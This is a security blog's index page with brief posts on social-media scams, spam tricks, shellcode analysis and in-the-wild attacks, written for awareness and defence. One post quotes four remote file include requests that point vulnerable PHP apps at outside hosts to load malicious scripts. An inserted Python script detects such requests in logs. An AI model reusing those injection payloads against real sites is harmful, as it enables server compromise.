secgeeks's blog
Alert : Facebook - 10 lies girls tell guys.. not a good application to have!!
I use Facebook to connect with my friends. A few days back I received an application invite named "10 lies girls tell guys.." from a friend of mine. Since it was from a trusted person and the title is catchy, I decided to try this app.
But to my surprise, when I opened the application it gave a window with instructions like: press Ctrl+C, then press Alt+D, then press Ctrl+V, and after that press Enter. read more »
Spammers using Google feed proxy to send spam!!
Spammers have now started using Google feed proxy links to avoid detection. Today I received the following email:
As you can see, it uses the following link:
http://feedproxy.google.com/~r/juy7/~3/cy83akSysSk
It's just a 301 redirect:
and the end result is the following:
Let's see what will be next!!
We are back!!
Secgeeks.com is back after having lots of downtime. We are receiving lots of traffic (which means we are improving), so we are facing downtime with our hosts. Hopefully we will manage it now!!
RIP +Fravia
Some of you know him while some of you don't. For some it is news and for some it is not. +Fravia was an outstanding reverse engineer who inspired many people in reverse engineering. He passed away in May at the age of 56.
It is sad news.
Rest in Peace, +Fravia. You won’t be forgotten.
Facebook's Tribute to Michael Jackson
SecGeeks Alert : Fake Conflicker/Downadup removal tool spreading through email
I have received this mail today:
"Dear windows User,
Following a recent outbreak of the conflicker worm also known as downadup or trojan/brisv.a affecting over 15million Microsoft Windows users.. Merely
visiting a lot of popular sites could have gotten you infected. The virus exploited a vulnerability in all windows versions and products including the windows xp and vista operating systems. Researchers at Microsoft have
been working closely with Symantec, the creators of Norton antivirus and have come up with a removal tool for the conflicker virus. The average anti-virus read more »
Ghostscript jbig2dec JBIG2 Processing Buffer Overflow Vulnerability
How to analyze shellcode?
Often in exploit analysis we need to analyze the shellcode: what it does and how. There are many ways you can do it, but the simplest way is to use the following link:
http://sandsprite.com/shellcode_2_exe.php
Just copy and paste your shellcode and it will give you an exe containing the shellcode. Then you can simply run it in OllyDbg and step in. Sometimes the shellcode is encrypted using XOR, but that is very simple to decode.
Hope it helps ..
Cheers,
SecGeek
BBC hacks into thousands of PCs
I was reading this story
From the article:
"The BBC has deliberately hacked into 22,000 PCs to prove the power of botnets, and the damage that can be done with a network of compromised computers.
Click – BBC News’ technology programme – with the help of anti-virus company Prevx, took over thousands of computers in order to demonstrate a growing problem in the modern world. read more »
[Quick Post] Facebook Striptease Dance Party
I received this mail:
The subject of the mail is catchy and anyone can get diverted by it. At first look the URL also seems to be coming from Facebook, but in fact it is not.
Look at the highlighted URL. That's the original URL, so beware of it.
Pcapr is good..
If you work with packets and network protocols, then I am sure you have lots of problems modifying them. Currently there is a limited number of tools which allow you to edit packets. Today I was playing with pcapr and I found it awesome. It has all the features which are required: you can upload packets, browse other dumps, modify dumps and download them. A good thing for your toolbox. You can access it here.
PHPBB after hack password analysis
I was reading this article at Darknet. It provides an analysis of the PHPBB user passwords, that is, what kind of passwords general users keep. The analysis has some strange results, stating that most of the passwords are very common and you can easily find them online here.
I have not used PHPBB much and I don't remember if it forces a minimal password length or complexity. read more »
MetaScanner v1.1 released
Browser Fuzzer
Google Prob? This site may harm your computer?
Strange, every site I am searching for right now on Google is coming up with the message "this site may harm your computer" in the search results. See below:
Is it me alone, or are others also facing this problem?
Remote File Include Vulnerabilities getting exploited in the wild?
Previously I posted an article on secgeeks.com regarding remote file include vulnerabilities. I am constantly seeing an increase in such requests. The following URLs contain so-called malicious files (appended to the requested file):
secure.php?cfgProgDir=http://www.kmt-s.ru/chid.txt???
//sofi_webgui/hu/modules/reg-new/modstart.php?mod_dir=http://203.114.112.155/webboard1234/1.jpg?
minibb/index.php?absolute_path=http://www.beautifulchurch.org/images/main/main.js
cyberfolio/portfolio/msg/view.php?av=http://www.sacot-dz.com/webmail/logs/log.txt???? read more »
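A way to flag such requests when reviewing web server logs, as an added example that is not part of the original post: it reports any query parameter whose value is an absolute URL on a host you do not own. The function names, the two benign sample lines and the `www.example.org` own-host value are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# The four request paths quoted in the post, plus two constructed benign ones.
SAMPLE_REQUESTS = [
    "secure.php?cfgProgDir=http://www.kmt-s.ru/chid.txt???",
    "//sofi_webgui/hu/modules/reg-new/modstart.php?mod_dir=http://203.114.112.155/webboard1234/1.jpg?",
    "minibb/index.php?absolute_path=http://www.beautifulchurch.org/images/main/main.js",
    "cyberfolio/portfolio/msg/view.php?av=http://www.sacot-dz.com/webmail/logs/log.txt????",
    "index.php?page=about&lang=en",                     # constructed, benign
    "login.php?return=http://www.example.org/account",  # constructed, own host
]

REMOTE_SCHEME = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def find_rfi_params(request, own_hosts=()):
    """Return (param, remote_host, trailing_qmarks) for each parameter whose
    value is an absolute URL pointing at a host that is not in own_hosts."""
    _, _, query = request.partition("?")
    hits = []
    # parse_qsl splits on '&' and the first '=', and percent-decodes once,
    # so an encoded http%3A%2F%2F... value is caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = value.strip()
        if not REMOTE_SCHEME.match(value):
            continue
        host = (urlsplit(value).hostname or "").lower()
        if not host or host in own_hosts:
            continue
        # Count the trailing '?' characters seen on several of the logged values;
        # they are a useful extra indicator when triaging hits.
        trailing = len(value) - len(value.rstrip("?"))
        hits.append((name, host, trailing))
    return hits


def scan(requests, own_hosts=()):
    """Map each flagged request to its suspicious parameters."""
    return {r: h for r in requests if (h := find_rfi_params(r, own_hosts))}


if __name__ == "__main__":
    for req, hits in scan(SAMPLE_REQUESTS, own_hosts={"www.example.org"}).items():
        print(req, "->", hits)
```

Passing your own hostnames in `own_hosts` keeps legitimate redirect parameters out of the results.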
Megaupload auto-fill captcha
Open Letter from Geeks to IT Recruiters and Hiring Managers
Axon has posted a nice thing here regarding what geeks expect in a job. From the article:
" For the love of all things good in the world, learn how to hire and employ a geek. You're doing it wrong.
Office Politics
Try to measure productivity in output, not in hours. read more »
Nokia lottery spam?
Check this image; people have started using Nokia to spam others...
MSIE 0-day Spreading Via SQL Injection
From the SANS diary here:
"One of our readers submitted this log entry, which shows a typical SQL injection exploit. The "new" part is that the javascript injected in this case is trying to exploit the MSIE 0-day:
In this case, the SQL injection is delivered as a cookie, not a GET parameter.
I broke up the strings for readability and inserted spaces around the malicious URL. As usual with these kinds of exploit, the script will load another script which will load another script ultimately leading to the IE exploit." read more »



